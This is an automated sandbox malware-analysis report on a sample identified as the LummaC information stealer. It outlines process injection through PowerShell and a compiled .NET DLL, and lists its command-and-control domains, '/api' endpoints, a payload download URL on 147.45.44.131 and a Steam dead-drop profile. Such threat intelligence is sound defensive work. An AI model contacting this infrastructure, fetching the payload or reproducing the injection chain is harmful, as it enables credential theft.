Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009AC080 CreateNamedPipeA,GetLastError,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetLastError,CreateEventW,GetLastError,ConnectNamedPipe,GetLastError, 0_2_009AC080
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A2F090 GetProcessHeap,HeapAlloc,GetSystemTimeAsFileTime,QueryPerformanceCounter,GetProcessHeap,HeapAlloc, 0_2_00A2F090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519693 Sample: file.exe Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 33 vozmeatillu.shop 2->33 35 stogeneratmns.shop 2->35 37 10 other IPs or domains 2->37 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 13 other signatures 2->53 9 file.exe 2 2->9         started        signatures3 process4 signatures5 55 Suspicious powershell command line found 9->55 57 Contains functionality to prevent local Windows debugging 9->57 12 powershell.exe 15 22 9->12         started        process6 dnsIp7 45 147.45.44.131, 49730, 80 FREE-NET-ASFREEnetEU Russian Federation 12->45 29 C:\Users\user\AppData\...\uy2pimwz.cmdline, Unicode 12->29 dropped 31 C:\Users\user\AppData\Local\...\uy2pimwz.0.cs, Unicode 12->31 dropped 59 Writes to foreign memory regions 12->59 61 Suspicious execution chain found 12->61 63 Compiles code for process injection (via .Net compiler) 12->63 65 2 other signatures 12->65 17 csc.exe 3 12->17         started        20 RegAsm.exe 12->20         started        23 conhost.exe 12->23         started        file8 signatures9 process10 dnsIp11 27 C:\Users\user\AppData\Local\...\uy2pimwz.dll, PE32 17->27 dropped 25 cvtres.exe 1 17->25         started        39 ballotnwu.site 104.21.2.13, 443, 49741 CLOUDFLARENETUS United States 20->39 41 gutterydhowi.shop 104.21.4.136, 443, 49732 CLOUDFLARENETUS United States 20->41 43 6 other IPs or domains 20->43 file12 process13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.4.136
 gutterydhowi.shop United States
13335 CLOUDFLARENETUS true
147.45.44.131
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU false
188.114.97.3
 fragnantbui.shop European Union
13335 CLOUDFLARENETUS true
172.67.162.108
 drawzhotdog.shop United States
13335 CLOUDFLARENETUS true
188.114.96.3
 offensivedzvju.shop European Union
13335 CLOUDFLARENETUS true
104.102.49.254
 steamcommunity.com United States
16625 AKAMAI-ASUS false
104.21.2.13
 ballotnwu.site United States
13335 CLOUDFLARENETUS true
104.21.83.105
 ptramidermsnqj.shop United States
13335 CLOUDFLARENETUS true
172.67.208.139
 reinforcenh.shop United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
fragnantbui.shop 188.114.97.3 true
gutterydhowi.shop 104.21.4.136 true
steamcommunity.com 104.102.49.254 true
ptramidermsnqj.shop 104.21.83.105 true
offensivedzvju.shop 188.114.96.3 true
stogeneratmns.shop 188.114.96.3 true
reinforcenh.shop 172.67.208.139 true
drawzhotdog.shop 172.67.162.108 true
ghostreedmnu.shop 188.114.96.3 true
vozmeatillu.shop 188.114.97.3 true
ballotnwu.site 104.21.2.13 true
171.39.242.20.in-addr.arpa unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://drawzhotdog.shop/api true
  • Avira URL Cloud: malware
 unknown
http://147.45.44.131/files/gqgqg.exe false
  • Avira URL Cloud: safe
 unknown
https://gutterydhowi.shop/api true
  • Avira URL Cloud: malware
 unknown
reinforcenh.shop true
  • Avira URL Cloud: malware
 unknown
stogeneratmns.shop true
  • Avira URL Cloud: malware
 unknown
https://reinforcenh.shop/api true
  • Avira URL Cloud: malware
 unknown
ghostreedmnu.shop true
  • Avira URL Cloud: malware
 unknown
https://ballotnwu.site/api true
  • Avira URL Cloud: malware
 unknown
https://ptramidermsnqj.shop/api true
  • Avira URL Cloud: malware
 unknown
https://steamcommunity.com/profiles/76561199724331900 true
  • URL Reputation: malware
 unknown
https://vozmeatillu.shop/api true
  • Avira URL Cloud: malware
 unknown
https://stogeneratmns.shop/api true
  • Avira URL Cloud: malware
 unknown
ptramidermsnqj.shop true
  • Avira URL Cloud: malware
 unknown
https://ghostreedmnu.shop/api true
  • Avira URL Cloud: malware
 unknown
fragnantbui.shop true
  • Avira URL Cloud: malware
 unknown
gutterydhowi.shop true
  • Avira URL Cloud: malware
 unknown
https://offensivedzvju.shop/api true
  • Avira URL Cloud: malware
 unknown
https://fragnantbui.shop/api true
  • Avira URL Cloud: malware
 unknown
offensivedzvju.shop true
  • Avira URL Cloud: malware
 unknown
drawzhotdog.shop true
  • Avira URL Cloud: malware
 unknown
vozmeatillu.shop true
  • Avira URL Cloud: malware
 unknown